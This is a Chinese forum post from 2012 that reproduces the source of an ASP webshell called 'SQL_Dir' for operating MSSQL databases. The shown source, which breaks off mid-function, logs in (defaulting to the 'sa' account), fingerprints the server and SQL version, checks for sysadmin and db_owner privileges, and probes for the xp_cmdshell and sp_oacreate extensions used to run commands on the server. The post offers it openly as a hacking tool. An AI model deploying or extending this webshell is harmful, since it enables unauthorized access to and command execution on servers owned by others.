首页>网页设计>asp技术>mssql操作用webshell--sql_dir.asp
回复
« 返回列表
灯火互联
灯火互联
管理员
管理员
  • 注册日期2011-07-27
  • 发帖数41778
  • QQ
  • 火币41290枚
  • 粉丝1086
  • 关注100
写私信 打招呼
  • 终身成就奖
  • 最爱沙发
  • 忠实会员
  • 灌水天才奖
  • 贴图大师奖
  • 原创先锋奖
  • 特殊贡献奖
  • 宣传大使奖
  • 优秀斑竹奖
  • 社区明星
阅读:3557回复:0

mssql操作用webshell--sql_dir.asp

楼主#
更多 发布于:2012-09-10 21:40


摘自:WowoS Blog
<title>SQL_Dir By Bin</title>
<style id=theStyle>
BODY {
FONT-SIZE: 9pt;
COLOR: #000000;
background-color: #ffffff;
FONT-FAMILY: "Courier New";
scrollbar-face-color:#E4E4F3;
scrollbar-highlight-color:#FFFFFF;
scrollbar-3dlight-color:#E4E4F3;
scrollbar-darkshadow-color:#9C9CD3;
scrollbar-shadow-color:#E4E4F3;
scrollbar-arrow-color:#4444B3;
scrollbar-track-color:#EFEFEF;
}
TABLE {
FONT-SIZE: 9pt;
FONT-FAMILY: "Courier New";
BORDER-COLLAPSE: collapse;
border-width: 1px;
border-top-style: solid;
border-right-style: none;
border-bottom-style: none;
border-left-style: solid;
border-color: #d8d8f0;
}
.tr {
font-family: "Courier New";
font-size: 9pt;
background-color: #e4e4f3;
text-align: center;
}
.td {
height: 24px;
font-size: 9pt;
background-color: #f9f9fd;
font-family: "Courier New";
}
input {
font-family: "Courier New";
BORDER-TOP-WIDTH: 1px;
BORDER-LEFT-WIDTH: 1px;
FONT-SIZE: 12px;
BORDER-BOTTOM-WIDTH: 1px;
BORDER-RIGHT-WIDTH: 1px;
color: #000000;
}
textarea {
font-family: "Courier New";
BORDER-WIDTH: 1px;
FONT-SIZE: 12px;
color: #000000;
}
A:visited {
FONT-SIZE: 9pt;
COLOR: #333333;
FONT-FAMILY: "Courier New";
TEXT-DECORATION: none;
}
A:active {
FONT-SIZE: 9pt;
COLOR: #3366cc;
FONT-FAMILY: "Courier New";
TEXT-DECORATION: none;
}
A:link {
FONT-SIZE: 9pt;
COLOR: #000000;
FONT-FAMILY: "Courier New";
TEXT-DECORATION: none;
}
A:hover {
FONT-SIZE: 9pt;
COLOR: #3366cc;
FONT-FAMILY: "Courier New";
TEXT-DECORATION: none;
}
tr {
font-family: "Courier New";
font-size: 9pt;
line-height: 18px;
}
td {
font-size: 9pt;
font-family: "Courier New";
border-width: 1px;
border-top-style: none;
border-right-style: solid;
border-bottom-style: solid;
border-left-style: none;
border-color: #d8d8f0;
}
.trHead {
font-family: "Courier New";
height: 2px;
background-color: #e4e4f3;
line-height: 2px;
}
.fixSpan {
overflow: hidden;
white-space: nowrap;
text-overflow: ellipsis;
vertical-align: baseline;
}
.fixTable {
word-break: break-all;
word-wrap: break-word;
}
#fileList span{
width: 120px;
line-height: 23px;
cursor: hand;
overflow: hidden;
padding-left: 5px;
white-space: nowrap;
text-overflow: ellipsis;
vertical-align: baseline;
border: 1px solid #ffffff;
}
</style>
<%if session("login")="" then%>
<%
Echo "<body onload=document.formx.pass.focus();>"
Echo "<table width=816 align=center>"
Echo "<form method=post name=formx action=?action=login>"
Echo "<tr>"
Echo "<td align=center class=td>数 据 库 连 接</td>"
Echo "</tr>"
Echo "<tr>"
Echo "<td height=75 align=center>"
Echo "IP:<input name=ip type=text style=border:1px solid #d8d8f0;background-color:#ffffff; value=localhost> "
Echo "PORT:<input name=port type=text style=border:1px solid #d8d8f0;background-color:#ffffff; value=1433> "
Echo "USER:<input name=user type=text style=border:1px solid #d8d8f0;background-color:#ffffff; value=sa> "
Echo "PASS:<input name=pass type=text style=border:1px solid #d8d8f0;background-color:#ffffff;> "
Echo "</td>"
Echo "</tr>"
Echo "<tr>"
Echo "<td align=center class=td><input type=submit value=LOGIN style=border:1px solid #d8d8f0;background-color:#f9f9fd;></td>"
Echo "</tr>"
Echo "<tr>"
Echo "<td align=center class=td>2007 @ SQL_DIR By Bin <br><a href=http://www.rootkit.net.cn target=_blank>www.rootkit.net.cn</a></td>"
Echo "</tr>"
Echo "</form>"
Echo "</table>"
Echo "</body>"
%>

<%End If %>
<%
If request("action")="login" Then
SqlLocalName ="";request.Form("ip");",";request.Form("port");"" 连接IP [ 本地用 (local) 外地用IP ]
SqlUserName ="";request.Form("user");"" 用户名
SqlPassword ="";request.Form("pass");"" 用户密码
SqlDatabaseName="sql" 数据库名
ConnStr = "Provider=Sqloledb;User ID=" ; SqlUserName ; "; Password=" ; SqlPassword ; "; Initial CataLog = " ; SqlDatabaseName ; "; Data Source=" ; SqlLocalName ; ";"
SqlNowString="GetDate()"
On Error Resume Next 容错
Set Conn=Server.CreateObject("ADODB.Connection")
Conn.open ConnStr
If Err.number=-2147467259 Then
Echo "<script language=javascript> alert(主机IP或者端口连接错误,请检查!);history.back(); </script>"
ElseIf Err.number=-2147217843 Then
Echo "<script language=javascript> alert(用户名或者密码错误,请检查!);history.back(); </script>"
End If
If Err.number=0 Then
session("login")="yes"
session("user")=request.Form("user")
session("pass")=request.Form("pass")
session("ip")=request.Form("ip")
session("port")=request.Form("port")
End If
response.redirect"?action=tools"
End If
%>
<%


If request("action")="tools" or request("action")="" Then
If session("login")="yes" Then
%>
<%
rem----------------------------数据库连接-----------------
ConnStr = "Provider=Sqloledb.1;User ID=" ;session("user"); "; Password=" ;session("pass"); "; Initial CataLog = " ; SqlDatabaseName ; "; Data Source=" ; session("ip") ; ",";session("port");";"
Set Conn=Server.CreateObject("ADODB.Connection")
Conn.open ConnStr
Set Cat = Server.CreateObject("ADOX.Catalog")
Cat.ActiveConnection = conn.ConnectionString
rem------------------------函数-------------
Sub Echo(sStr)
Response.Write sStr
End Sub
Function IIf(var, val1, val2)
If var = True Then IIf = val1 Else IIf = val2
End Function
const copyright = "Code By Bin<br><a href = http://www.rootkit.net.cntarget=_blank>www.rootkit.net.cn</a>"
RootPath = Server.MapPath("/")
Path=Request.ServerVariables("PATH_TRANSLATED")
Server_Name=Request.ServerVariables("SERVER_NAME")
IP=Request.ServerVariables("LOCAL_ADDR")
PORT=Request.ServerVariables("SERVER_PORT")
OS= Request.ServerVariables("OS")
OS= IIf(OS = "", "Windows2003", OS) ; ", " ; Request.ServerVariables("SERVER_SOFTWARE")
OS= OS ; ", " ; ScriptEngine ; "/" ; ScriptEngineMajorVersion ; "." ;ScriptEngineMinorVersion ; "." ; ScriptEngineBuildVersion
Curl=Request.ServerVariables("SCRIPT_NAME")
RequestUrl=Request.ServerVariables("Url")
URL="http://";Server_Name;Requesturl
rem--------------------------------------

rem-----------------------数据库操作--------------------
Set rs = conn.execute("select @@version")
SQLversion=rs(0)
Set rs = Conn.execute("select db_name(0)")
DBname=rs(0)
Set rs = Conn.execute("select user")
DBuser=rs(0)
权限判断
Set rs = Conn.execute("Select IS_SRVROLEMEMBER(sysadmin)")
If rs(0)=1 Then
dbo="sa"
End If
Set rs = Conn.execute("Select IS_MEMBER(db_owner)")
If rs(0)=1 Then
dbo="db_owner"
Else
dbo="public"
End If
扩展判断
Set rs = Conn.execute("select count(*) from master.dbo.sysobjects where xtype=X and name=xp_cmdshell")
If rs(0)=1 Then
xp_cmdshell="XP_cmdshell √"
Else
xp_cmdshell="XP_cmdshell ×"
End If
Set rs = Conn.execute("select count(*) from master.dbo.sysobjects where xtype=X and name=sp_oacreate")
If rs(0)=1 Then
sp_oacreate="SP_oacreate √"
喜欢0 评分0
淘宝天猫隐藏优惠券地址
回复
游客

Powered by atcpu.com ©2008-2021

灯火互联网 蜀ICP备13028548号

手机认证个人空间个人相册音乐电台音乐畅听网站终身会员手机吉凶在线YY百宝箱
返回顶部